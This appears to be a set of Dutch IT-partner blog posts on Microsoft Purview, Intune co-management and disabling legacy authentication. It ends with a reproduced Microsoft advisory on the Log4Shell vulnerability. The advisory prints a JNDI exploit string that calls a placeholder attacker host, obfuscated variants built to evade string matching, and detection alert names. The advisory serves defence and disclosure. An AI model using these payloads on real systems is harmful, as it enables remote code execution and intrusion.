Dagelijks worden er gegevens gedeeld op de werkvloer en het neemt steeds meer toe. Het is belangrijk om dit effectief te beheren. In veel gevallen moet inhoud zoals documenten en rapporten bewaard blijven door wetgeving of regels die de organisatie hieraan stelt.
Door gebruik te maken van Microsoft Purview Data Life Cycle Management bewaar je wat je nodig hebt en verwijder je oude informatie die niet meer van toepassing is.
Het grote voordeel is dat je datalekken voorkomt en geen onnodige opslagkosten hebt. De organisatie blijft ook altijd met actuele en relevante inhoud werken.
Hoe gaat het in zijn werk?
Via Power Automate kun je een retentie label toekennen aan bestanden die opgeslagen staan in SharePoint Online.
Wanneer bepaalde meta data wordt gewijzigd in een bestand, bijvoorbeeld een kolom ‘Status’ verandert van ‘Draft’ naar ’Closed’, zorgt dit voor een trigger in Power Automate. Vervolgens wordt er een retentie label toegekend.
Het retentiebeleid bepaalt dan of een item bewaard moet blijven of moet worden verwijderd.
Met co-management kun je devices die lokaal worden beheerd met Microsoft Endpoint Configuration Manager (voorheen SCCM of SMS) ook beheren met Endpoint manager (voorheen Intune). Hiermee kun je devices blijven beheren in MECM, maar ook de voordelen van de cloud en Endpoint Manager gebruiken. Ook is het een mooie stap in een overgang van MECM naar Endpoint manager. Hiermee verbind je dus direct de devices met de cloud.
Hoe werkt het
Het is dus mogelijk om zowel beheer te doen vanuit MECM als Endpoint manager. Uiteraard wil je niet dat dit door elkaar heen loopt of je verschillende configuraties door krijgt vanuit twee kanten. Om deze reden kies je per workload of je dit in MECM of in Endpoint manager wil beheren. Zodra je dus bijvoorbeeld Compliance policies omzet van Configuration Manager naar Intune, wordt dit vanaf dat moment niet meer door MECM geregeld, maar gelijk door Endpoint Manager. In onderstaande afbeelding zie je hoe dit in zijn werk gaat. Dit regel je vanuit MECM.
De opties Configuration Manager en Intune spreken hier voor zich. Bij de optie “Pilot Intune” kies je voor een Pilot groep die je aan kunt maken binnen MECM. Dit kun je dus zien als een speciale test groep die je wilt gebruiken om een workload naar over te zetten. Daarnaast voor je dit sowieso uit op een gekozen device collection in MECM. Uiteraard is het belangrijk dat je Endpoint manager eerst configureert voor de onderdelen die het moet gaan overnemen. We raden hierbij sterk aan om dit eerst op een test groep uit te voeren.
Volledig overgaan naar Endpoint Manager
Zoals eerder aangegeven is het ook mogelijk om vanuit dit punt volledig over te gaan op Endpoint manager. Zodra alle “sliders” zijn omgezet naar Endpoint Manager en dit ook volledig is ingericht wordt er eigenlijk alleen nog maar gebruik gemaakt van Endpoint Manager. Je kunt er dan ook voor kiezen om de MECM client te verwijderen van de devices. Wel is het dan belangrijk om uiteindelijk ook over te gaan op online accounts, omdat er vanuit een Hybride situatie altijd gewerkt wordt vanuit een account op het lokale domein. Dit geeft bijvoorbeeld uitdagingen bij het wijzigen van het wachtwoord wanneer iemand zich niet binnen het domein bevindt.
Vereisten
Windows 10 versie 1709 of nieuwer
End devices zijn hybrid joined via Azure AD connect
Het device moet zowel lokaal als in Azure gejoined zijn, omdat het device vanuit beide kanten wordt beheerd. Een Azure AD registratie is hierbij niet voldoende.
Connectie van MECM naar de online tenant.
AADP1 or AADP2
Intune subscription (bijvoorbeeld Enterprise Mobility + Security E3 of E5)
Het is geen geheim dat het hybride werken de manier is waarop we nu communiceren, samenwerken en informatie delen fundamenteel heeft veranderd. Medewerkers zitten niet langer meer bij elkaar op kantoor; zij werken in virtuele ruimtes.
Hybride werken heeft veel voordelen, maar creëert ook nieuwe uitdagingen en verplichtingen. Organisaties worden geconfronteerd met wet- en regelgeving waardoor ze communicatie snel moeten kunnen identificeren, onderzoeken en verminderen. Denk hierbij aan het delen van gevoelige informatie tot het gebruik van intimiderend of bedreigend taalgebruik dat duidelijk in strijd is met de gedragscode van de organisatie.
Microsoft Purview Communication Compliance helpt organisaties bij het bevorderen van veilige communicatie. Met de aankondiging van Microsoft Purview, Communication Compliance heeft een paar nieuwe mogelijkheden;
Verminderde detectie tot onderzoekstijd (van 24 uur naar 1 uur)
Machine Learning highlighting
Handgeschreven tekst in afbeeldingen – Optical Character Recognition (OCR)
Zie hieronder hoe de Communication Compliance Machine Learning model heeft ontdekt dat een gebruiker via Teams de tekst “ik vind jou een rotjong” heeft geplaatst. Deze tekst wordt opgemerkt als ongepast gedrag waardoor een manager dit verder kan onderzoeken.
Daarnaast kan er tekst worden herkend in afbeeldingen. Zie in de afbeelding hieronder waar de tekst in het rood “Buy Now” gedetecteerd kan worden.
Ongepast gedrag en gevoelige informatie Als deze mogelijkheden dragen bij om inzicht te krijgen in ongepast gedrag. Met deze inzichten kan er uiteindelijk een veilige manier van communiceren en samenwerken worden gecreëerd. Deze slimme Machine Learning oplossingen kunnen door de hele Microsoft 365 omgeving worden ingezet zoals Teams, Outlook, SharePoint en OneDrive.
Microsoft heeft haar oplossingen voor datagovernance en compliance samengebracht in Microsoft Purview. Hiermee willen zij de toegankelijkheid van de compliance-portfolio vergroten. Doordat de gegevensbeheer- en compliance-oplossingen van Microsoft in Microsoft 365 en Azure nu zijn samengevoegd zijn ze alomvattend en gemakkelijker te vinden en gebruiken. Alle oplossingen zijn nu ondergebracht in Microsoft Purview.
De producten geven inzicht in de gegevens van een organisatie door het hele datalandschap. Gegevensbeveiliging kan worden verbeterd in cloudomgevingen, applicaties en eindpunten. De oplossingen helpen ook bij het beheren van end-to-end datarisico’s en compliance omtrent wet- en regelgeving.
De rebranding gaat per direct in. Microsoft 365 Advanced Audit werd bijvoorbeeld hernoemd tot Purview Audit en Azure Purview Data Catalog werd Purview Data Catalog. Hieronder geven we een overzicht met alle oude en nieuwe productnamen.
Rebranding Microsoft Purview
Microsoft 365 Advanced Audit
Microsoft Purview Audit (Premium)
Microsoft 365 Communication Compliance
Microsoft Purview Communication Compliance
Microsoft Compliance Manager
Microsoft Purview Compliance Manager
Office 365 Customer Lockbox
Microsoft Purview Customer Lockbox
Azure Purview Data Catalog
Microsoft Purview Data Catalog
Microsoft 365 Data Connectors
Microsoft Purview Data Connectors
Microsoft Information Governance
Microsoft Purview Data Lifecycle Management
Office 365 Data Loss Prevention
Microsoft Purview Data Loss Prevention
Azure Purview Data Map
Microsoft Purview Data Map
Double Key Encryption for Microsoft 365
Microsoft Purview Double Key Encryption
Records Management in Microsoft 365
Microsoft Purview Records Management
Office 365 Advanced eDiscovery
Microsoft Purview eDiscovery (Premium)
Microsoft 365 Information Barriers
Microsoft Purview Information Barriers
Microsoft Information Protection
Microsoft Purview Information Protection
Microsoft 365 Insider Risk Management
Microsoft Purview Insider Risk Management
Azure Purview Portal
Microsoft Purview Governance Portal
Microsoft 365 Compliance Center
Microsoft Purview Compliance Portal
Alle producten vallen nu onder het Purview label
Nieuwe functionaliteit Naast het samenvoegen heeft Microsoft haar DLP oplossing een update gegeven met nieuwe functionaliteit. Microsoft Purview Data Loss Prevention (noemen we het nu MPDLP i.p.v. DLP? ;-)) voor macOS is nu algemeen beschikbaar én we zijn enthousiast over het feit dat er 50 nieuwe classificaties toegevoegd aan de gevoelige informatietypecatalogus, wat ingezet kan worden voor o.a. Sensitivity Labels.
Cloud Life was als enige partner wereldwijd aanwezig op het hoofdkantoor van Microsoft tijdens de rebranding, samen met de Microsoft Product Group. Hierdoor kunnen wij directe feedback over de oplossingen uit de praktijk geven die direct verwerkt worden, en krijgen wij als eerste partner wereldwijd inzichten tot nieuwe functionaliteiten die we voor onze klanten kunnen testen en inzetten.
Vragen
Heb jij vragen of uitdagingen omtrent Microsoft Cloud Security, Compliance of Privacy en/of de M365 producten relatie hiertoe? Wil je weten wat zero trust inhoudt of waar jullie staan als organisatie op de security ladder? Geen vraag is ons te gek over deze onderwerpen. Neem contact op met: erikjan@cloudlife.nl.
Vaak opgeslagen op het apparaat, vertrouwen basisverificatieprotocollen op het verzenden van gebruikersnamen en wachtwoorden bij elk verzoek, waardoor het risico toeneemt dat aanvallers de inloggegevens van gebruikers vastleggen, vooral als ze niet TLS-beveiligd zijn. Basisverificatie, hoewel noodzakelijk voor bedrijven die verouderde software gebruiken, kan MFA niet afdwingen en wordt vervangen door moderne verificatie.
De legacy-instellingen stonden al jaren op de radar van Microsoft om te repareren. In 2018 kondigde Microsoft aan dat het een reeks wijzigingen – en uiteindelijk afschaffing – zou introduceren in zijn authenticatiecontroles als een middel om organisaties te helpen het risico te verminderen. Deze wijzigingen zouden over een aantal jaren plaatsvinden, en in september 2021 kondigden ze aan dat ze eind 2022 Basisverificatie permanent zullen uitschakelen in alle M365 tenants, ongeacht het gebruik, met uitzondering van SMTP-verificatie (lees hier hoe je SMTP AUTH open kunt laten staan, indien benodigd).
Lijst met basisverificatieprotocollen
Om de implementatie van de organisatie te beveiligen, is de eerste stap te weten welke typen basisverificatieprotocollen er bestaan. Binnen Microsoft omvatten de beschouwde basis-/legacy-protocollen:
Geauthenticeerde SMTP – Gebruikt door POP- en IMAP-clients om e-mailberichten te verzenden
Autodiscover – Gebruikt door Outlook- en EAS-clients om mailboxen in Exchange Online te vinden en ermee te verbinden
Exchange ActiveSync (EAS) – Wordt gebruikt om verbinding te maken met mailboxen in Exchange Online
Exchange Online PowerShell – Wordt gebruikt om verbinding te maken met Exchange Online met externe PowerShell
Exchange Web Services – Een programmeerinterface die wordt gebruikt door Outlook, Outlook voor Mac en apps van derden
IMAP – Gebruikt door IMAP-e-mailclients, zodat gebruikers overal en vanaf elk apparaat toegang hebben tot e-mail
MAPI via HTTP – Gebruikt door Outlook 2010 en later
OAB (Offline Address Book) – Een kopie van adreslijstverzamelingen die worden gedownload en gebruikt door Outlook
Outlook-service – Gebruikt door de app Mail en Agenda voor Windows 10
POP3 – Gebruikt door POP-e-mailclients om nieuwe berichten te downloaden en te verwijderen van de e-mailserverReporting Web Services
Andere clients – Alle andere protocollen die zijn geïdentificeerd als gebruikmakend van legacy-authenticatie
Deze authenticatieprotocollen ondersteunen geen moderne authenticatiemechanismen zoals multi-factor authenticatie (MFA), wat betekent dat het inschakelen van MFA niet voldoende is. Immers, een kwaadwillend persoon kan via deze protocollen MFA omzeilen, zelfs al heb je het aanstaan!
Om de beveiliging te verbeteren en de risico’s te verkleinen, moeten organisaties alle gebruikers en services vinden die de oude protocollen gebruiken, migreren om moderne protocollen te gebruiken en de basisprotocollen blokkeren.
Onze hulp leidt je door het ontdekkings- en blokkeringsproces, naast instructies voor het delen van aanvullende controles, zoals een beleid voor voorwaardelijke toegang, die uw Microsoft 365-beveiligingshouding kunnen versterken.
Ontdekking
Voordat alle verouderde protocollen binnen de organisatie worden afgesloten, is het belangrijk om gebruikers en services te identificeren die basisverificatie gebruiken. In plaats van de productiviteit te verlagen en gebruikersfrustratie te veroorzaken, is het belangrijk om gebruikers te laten weten dat het systeem wordt geüpgraded, wat bedrijfsonderbrekingen helpt voorkomen en een pijnloze overgang naar moderne protocollen bevordert.
Er zijn een paar manieren om meer te weten te komen over de houding van uw organisatie met behulp van deze methoden:
Powershell-script – laat zien voor welke gebruikers de oude uitwisselingsprotocollen zijn ingeschakeld
Rapport voor voorwaardelijke toegang – toont het daadwerkelijke gebruik van de basisverificatieprotocollen
Azure AD-aanmeldingslogboeken – toont aanmeldingen die zijn uitgevoerd met verouderde verificatieclients
Voorwaardelijke toegang – alleen rapporteren
Maak een rapport met Conditional Access (zie figuur 1) dat de gebruikers en services simuleert die zouden worden beïnvloed als basisauthenticatieprotocollen worden geblokkeerd. Dit rapport geeft inzicht in de gebruikers en services die daadwerkelijk gebruikmaken van de legacy-protocollen.
De voorgestelde looptijd voor dit rapport is drie maanden, om inactieve gebruikers op te vangen, en sporadische gebruikte of tijdgeplande services.
Afbeelding 1 Genereer een gebruikers- en servicesrapport over een periode van 3 maanden
Door het rapport te bekijken, ontstaat een beter beeld van verouderde protocollen die in gebruik zijn, waardoor de kans op ontbrekende services of gebruikers die nog steeds basisverificatieprotocollen in het spel hebben, wordt verkleind.
Azure AD-aanmeldingslogboeken
De aanmeldingslogboeken van Azure AD zijn een andere handige manier. Door in de logboeken te duiken en de “Client-app” te filteren, kunnen aanmeldingen worden onthuld die zijn uitgevoerd met verouderde authenticatieclients.
Afbeelding 2 Aanmeldingen onthullen die zijn uitgevoerd met verouderde authenticatieclients
Toegang blokkeren
Na zorgvuldig onderzoek en ontdekking van al het gebruik van basisauthenticatieprotocollen, is het tijd om ze te blokkeren.
Er zijn een paar bekende benaderingen voor het blokkeren van authenticatieprotocollen, een populaire is het gebruik van het beleid voor voorwaardelijke toegang.
Authenticatiebeleid
Geen kennis van voorwaardelijke toegang? Begin bij de bron. Microsoft heeft een speciale functie voor het blokkeren van basisverificatieprotocollen, waardoor het eenvoudig te beheren is via de beheerdersconsole.
Ga naar het Office-beheercentrum -> Instellingen -> Organisatie-instellingen -> Moderne authenticatie en schakel alle basisauthenticatieprotocollen uit (zorg ervoor dat moderne authenticatie is aangevinkt). Zie figuur 3.
Afbeelding 3 Alle basisverificatieprotocollen zijn uitgeschakeld
Door instellingen in het beheercentrum te wijzigen, wordt een nieuw authenticatiebeleid gemaakt en ingesteld als het standaardbeleid van de organisatie.
Gebruik PowerShell om te valideren: $default_policy = Get-OrganizationConfig | Selecteer DefaultAuthenticationPolicy; Get-AuthenticationPolicy $default_policy.DefaultAuthenticationPolicy;
Je kunt uitzonderingen instellen en verschillende verificatiebeleidsregels toewijzen aan specifieke gebruikers met behulp van PowerShell-opdrachten:
In dit voorbeeld wordt een nieuw authenticatiebeleid met de naam Test Groep gemaakt dat basisauthenticatie met IMAP mogelijk maakt en dit aan een gebruiker toewijst. Authenticatiebeleid is een must, maar niet voldoende om het dreigingsrisico van deze verouderde protocollen alleen te stoppen. Het authenticatiebeleid omvat oudere clients, mailboxprotocollen zoals IMAP en SMTP en andere clients zoals PowerShell. Echter, net als voorwaardelijke toegang, hoewel de service is geblokkeerd, zullen sommige klanten nog steeds feedback geven (waardoor bepaalde cyberaanvallen erin slagen een wachtwoord te achterhalen voor toepassing in andere SaaS-apps). Schakel de service volledig uit om deze belastende feedback te voorkomen. Het afsluiten van een service kan alleen worden gedaan voor mailboxen, die zes van de 13 protocollen dekken. Het blokkeren van het authenticatiebeleid dekt de rest.
Mailboxservices en transportconfiguratie
Het uitschakelen van een mailboxservice (of inschakelen bij uitsluiting) kan via de gebruikersinterface per gebruiker. Ga naar het Office-beheercentrum -> Gebruikers -> Actieve gebruikers -> selecteer een gebruiker (met mailbox) -> tabblad Mail -> Beheer e-mailapps en schakel de basisverificatieprotocollen uit: POP, IMAP, SMTP. Zie figuur 4. Houd er rekening mee dat SMTP, MAPI via HTTP en mobiel (Exchange ActiveSync) zowel basis- als moderne authenticatie ondersteunen.
Afbeelding 4 Basisverificatieprotocollen zijn niet aangevinkt
Er is geen SMTP-bulkbewerking voor meerdere mailboxen (POP- en IMAP-bulkbewerking vind je in het klassieke Exchange Admin Center). Transportconfiguratie bestuurt de hele Exchange-organisatie en een van de mogelijkheden is om de SMTP-service (zowel standaard als modern) uit te schakelen. Gebruik de PowerShell-opdracht om SMTP globaal uit te schakelen. Set-TransportConfig -SmtpClientAuthenticationDisabled $true
Gebruik Powershell-cmdlets om basisverificatieprotocollen voor alle mailboxen of subsets te blokkeren: $Users = Get-CASMailbox -ResultSize onbeperkt $Gebruikers | foreach {Set-CASMailbox -Identity $_ -SmtpClientAuthenticationDisabled $true -ActiveSyncEnabled $false -ImapEnabled $false -MapiEnabled $false -PopEnabled$false -OWAEnabled $false}
Uitsluitingen
Er zijn gevallen om te overwegen om verouderde protocollen uit te sluiten en toe te staan. Een manager die bijvoorbeeld een ouder apparaat gebruikt of een script dat is ontwikkeld met de oude protocollen en dat nu opnieuw moet worden ontwikkeld, kan een uitsluiting vereisen. In deze gevallen wordt het sterk aanbevolen om:
Documenteer: Zorg voor een procedure voor verzoeken en hun motivering
Limiteer: stel een tijdsperiode in die de aanvrager de tijd geeft om het probleem op te lossen dat hij de legacy-protocollen nodig heeft, of het nu gaat om het vervangen van het apparaat of tijd om de code te herschrijven, enz.
Voorwaardelijke toegang: gebruik compenserende controles door alleen specifieke apparaten toe te staan, of stel IP-beperkingen, geofencing en meer in met het beleid voor voorwaardelijke toegang.
Conclusie
Het beheren van SaaS-configuraties in een onderneming is ingewikkeld en deze handleiding is bedoelt om de overgang van de oude M365-protocollen naar een moderne omgeving te vergemakkelijken. Het proces kent meerdere stappen en vereist continu toezicht. Van de ontdekking van de verouderde authenticatieprotocollen die zijn geopend en gebruikt door gebruikers en bedrijfsprocessen tot het blokkeren van toegang en het implementeren en beheren van de uitsluitingen, beveiligingsteams moeten elk problematisch gebruik van het authenticatieprotocol induiken, verhelpen en beheren.
In grootschalige omgevingen, waar altijd veranderingen plaatsvinden en configuraties in de duizenden lopen, wordt aanbevolen om dit door een gespecialiseerde partner te laten uitvoeren.
Microsoft onderzoekt aanvallen waarbij gebruik wordt gemaakt van de kwetsbaarheid voor de uitvoering van externe code (RCE) in Apache Log4j 2 die op 9 december 2021 is bekendgemaakt. De kwetsbaarheid, bijgehouden als CVE-2021-44228 en “Log4Shell” genoemd, treft gebruik Log4j 2 versies 2.0 tot en met 2.14.1.
Log4j 2 is een op Java gebaseerde logboekbibliotheek die veel wordt gebruikt bij de ontwikkeling van bedrijfssystemen, is opgenomen in verschillende open-sourcebibliotheken en rechtstreeks is ingebed in belangrijke softwaretoepassingen. De reikwijdte van de impact is uitgebreid tot duizenden producten en apparaten, waaronder Apache-producten zoals Struts 2, Solr, Druid, Flink en Swift. Omdat dit beveiligingslek zich in een Java-bibliotheek bevindt, betekent het platformonafhankelijke karakter van Java dat het beveiligingslek op veel platforms kan worden misbruikt, waaronder zowel Windows als Linux. Aangezien veel op Java gebaseerde applicaties Log4j 2 kunnen gebruiken, moeten organisaties contact opnemen met leveranciers van applicaties en hardware of ervoor zorgen dat hun Java-applicaties de nieuwste up-to-date versie gebruiken. Ontwikkelaars die Log4j 2 gebruiken, moeten ervoor zorgen dat ze de nieuwste versie van Log4j zo snel mogelijk in hun applicaties opnemen om gebruikers en organisaties te beschermen.
Het beveiligingslek kan niet-geverifieerde externe code-uitvoering mogelijk maken, en het wordt geactiveerd wanneer een speciaal vervaardigde string die door de aanvaller wordt geleverd via verschillende invoervectoren, wordt geparseerd en verwerkt door de kwetsbare component van Log4j 2.
De speciaal vervaardigde tekenreeks die uitvoering van dit beveiligingslek mogelijk maakt, kan via verschillende componenten worden geïdentificeerd. De string bevat jdni, wat verwijst naar de Java Directory Naming Interface. Hierna gaat het protocol zoals ldap, ldaps, rmi, dns of http vooraf aan het domein van de aanvaller.
Zodra de aanvaller volledige toegang en controle heeft over de applicatie, kan hij talloze doelen uitvoeren. Microsoft heeft post-exploitatieactiviteiten waargenomen, waaronder het installeren van muntmijnwerkers, Cobalt Strike om diefstal van inloggegevens en zijwaartse beweging mogelijk te maken, en het exfiltreren van gevoelige gegevens uit systemen.
De uitvoering van dit beveiligingslek maakt gebruik van de optie log4j2.formatMsgNoLookups in de configuratie van de bibliotheek die is ingesteld op False. Om deze bedreiging te beperken, upgradet u exemplaren van Log4j naar versie 2.15.0 en zorgt u ervoor dat de optie log4j2.formatMsgNoLookups in de configuratie van de bibliotheek is ingesteld op True. Log4j versie 2.10.0 tot en met 2.14.1 hebben deze optie standaard ingesteld op False – als upgraden geen optie is, bewerk de optie dan handmatig in True. Alle systemen, ook die welke niet klantgericht zijn, zijn potentieel kwetsbaar voor deze exploit, dus backend-systemen en microservices moeten ook worden geüpgraded. Voor Apache Maven- of Gradle-projecten, update Log4j naar 2.15.0 in de afhankelijkheidsstructuur van het project.
Aangezien Microsoft en de industrie in het algemeen steeds meer inzicht krijgen in de impact van deze dreiging, publiceren we technische informatie die kan helpen bij het detecteren, onderzoeken en beperken van aanvallen, evenals richtlijnen voor het gebruik van Microsoft-beveiligingsoplossingen om de weerbaarheid tegen gerelateerde aanvallen.
Vanwege de internationale impact en technische Engelstalige gebaseerde terminologie is het artikel hierna in het Engels beschreven.
Analysis
The vulnerability is a remote code execution vulnerability that can allow an unauthenticated attacker to gain complete access to a target system. It can be triggered when a specially crafted string is parsed and processed by the vulnerable Log4j 2 component. This could happen through any user provided input.
The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:
${jndi:ldap://[attacker site]/a}
An attacker performs a https request against their target system which generates a log using Log4j that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability will then cause the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.
Given the fact that logging code and functionalities in applications and services are typically designed to process a variety of external input data coming from upper layers and from many possible vectors, the biggest risk factor of this vulnerability is predicting if an application has a viable attack vector path that will allow the malformed exploit string to reach the vulnerable Log4j 2 code and trigger the attack.
A common pattern of exploitation risk, for example, is a web application with code designed to process usernames, referrer, or user-agent strings in logs. These strings are provided as external input (e.g., a web app built with Apache Struts). An attacker can send a malformed username or set user-agent with the crafted exploit string hoping that this external input will be processed at some point by the vulnerable Log4j 2 code and trigger code execution.
As security teams work to detect the exploitation of the vulnerability, attackers have added obfuscation to these requests in an attempt to evade detections based on request patterns. We’ve seen things like running a lower or upper command within the exploitation string ({jndi:${lower:l}${lower:d}a${lower:p}) and even more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to get around string-matching detections.
While the vast majority of observed activity at time of publish has been scanning, exploitation and post-exploitation activities have also been observed. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.
Update [12/14/2021]: As of December 14, 2021, Microsoft has observed multiple threat actors leveraging the CVE-2021-44228 vulnerability in active attacks. Microsoft will continue to monitor threats taking advantage of this vulnerability and provide updates as they become available. To protect against these threats, we recommend that organizations follow the guidance detailed in succeeding sections.
Nation-state activity
MSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.
For example, MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.
In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.
Access brokers associated with ransomware
MSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.
Mass scanning activity continues
The vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of this vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.
Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.
Mitigations
Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
Vulnerability-specific mitigations
Update all Log4j2 deployments to use log4j-2.15.0 and apply the security updates for CVE-2021-44228. Upgrade all products, applications and components that consume Log4j2. Apply all security updates for Log4J listed in this advisory.
In case the Log4j vulnerable component cannot be updated, configure the parameter log4j2.formatMsgNoLookups to be set to ‘true’ when starting the Java Virtual Machine.
All systems, including those that are not customer facing, are potentially vulnerable to this exploit, so backend systems and microservices should also be upgraded. For Apache Maven or Gradle projects, update Log4j to 2.15.0 on the dependency tree of the project.
General hardening mitigations that might help detect exploitation and post-exploitation activities
Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.
Use a supported platform, such as Windows 10, to take advantage of regular security updates.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block majority of new and unknown variants.
Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.
You can assess how an attack surface reduction rule might impact your network by opening the security recommendation for that rule in threat and vulnerability management. In the recommendation details pane, check the user impact to determine what percentage of your devices can accept a new policy enabling the rule in blocking mode without adverse impact to user productivity.
For customers with RiskIQ EASM and Threat Intelligence, you can view threat intelligence on this CVE, including mitigation guidance and IOCs, here. Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it’s possible to surface all observed instances of Apache or Java, including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you.
For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the Attack Surface Intelligence Dashboard Log4J Insights tab.
Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all East-West traffic and Outbound traffic to internet. The vulnerability rulesets are continuously updated and includes CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.
Recommendation: Customers are recommended to configure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2021-44228 exploit.
Customers using Azure Firewall Standard can migrate to Premium by following these directions. Customers new to Azure Firewall premium can learn more about Firewall Premium.
For Azure customers: Azure Web Application Firewall (WAF) updated Default Rule Set (DRS) versions 1.0 and 1.1, which are available for Azure Front Door global deployments. Rule 944240 “Remote Command Execution” under Managed Rules was updated to help in detecting and mitigating this vulnerability by inspecting requests’ headers, URI, and body. This rule is already enabled by default in block mode for all existing WAF Default Rule Set configurations. Customers using WAF Managed Rules would have already received enhanced protection for the Log4j2 vulnerability (CVE-2021-44228), no additional action is needed.
Enable Azure Web Application Firewall (WAF) policy with Default Rule Set 1.0/1.1 on Front Door deployments to immediately avail of additional protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.
Note: The above protection is also available on Default Rule Set version 2.0, which is available under preview on Azure Front Door Premium. Customers using Azure CDN Standard from Microsoft can also avail of the above protection by enabling DRS 1.0.
More information for Managed Rules and Default Rule Set on Web Application Firewall can be found here.
Detection details
Antivirus
Microsoft Defender Antivirus detects threat components and behaviors with the following signatures:
Microsoft Defender Antivirus incorporates next-generation antivirus capabilities, including machine learning and behavioral detection. This can result in overlapping detections, particularly of first-seen components and polymorphic variants. The detection names are listed here for reference, but related alerts are not actively monitored.
Alerts with the following titles in the security center can indicate threat activity on your network:
Network connection seen in CVE-2021-44228 exploitation (detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity)
Possible exploitation of CVE-2021-44228 (detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation)
Possible Log4j exploitation
Suspicious script launched (detects multiple behaviors, including suspicious command launch post exploitation)
Alerts with the following titles in the Security Center can indicate threat activity on your network but may not necessarily be related to related to exploitation of CVE-2021-44228. We are listing them here as well as these generic behavioral alerts can also trigger in customer environments and it is also highly recommended that they are triaged and remediated immediately:
Suspicious remote PowerShell execution
Download of file associated with digital currency mining
Process associated with digital currency mining
Cobalt Strike command and control detected
Suspicious network traffic connection to C2 Server
Alerts with the following titles in the Security Center can indicate exploitation attempts against your network that may be successful or not, depending on whether the specially crafted exploit string ends up being processed by a vulnerable Log4j instance in your environment:
Exploitation attempt against Log4j (CVE-2021-4428) – This is part of a Microsoft 365 Defender chain event detection triggered in Microsoft Defender for Cloud Apps (formerly Microsoft Cloud Application Security) that detects attempts to exploit the CVE-2021-44228 vulnerability using a specially-crafted JDNI string (such as in the User-Agent) against cloud applications.
Screenshot of the Microsoft 365 Defender chain event detection triggered in Microsoft Defender for Cloud Apps
Microsoft Defender for Cloud
Microsoft Defender for Cloud’s threat detection capabilities have been expanded to surface ensure that exploitation of CVE-2021-44228 in several relevant security alerts:
On Windows
Detected obfuscated command line
Suspicious use of PowerShell detected
On Linux
Suspicious file download
Possible Cryptocoinminer download detected
Process associated with digital currency mining detected
Potential crypto coin miner started
A history file has been cleared
Suspicious Shell Script Detected
Suspicious domain name reference
Digital currency mining related behavior detected
Behavior similar to common Linux bots detected
Organizations using Microsoft Defender for Cloud can Inventory tools to begin investigations before there’s a CVE number. With Inventory tools, there are two ways to determine exposure:
Note: This doesn’t replace a search of your codebase. It’s possible that software with integrated Log4j libraries won’t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this tech community post. this tech community post.
Microsoft Defender for IoT
Microsoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below).
Screenshot of Microsoft Defender for IoT detection
The package is available for download from the Microsoft Defender for IoT portal (Click Updates, then Download file (MD5: 4fbc673742b9ca51a9721c682f404c41).
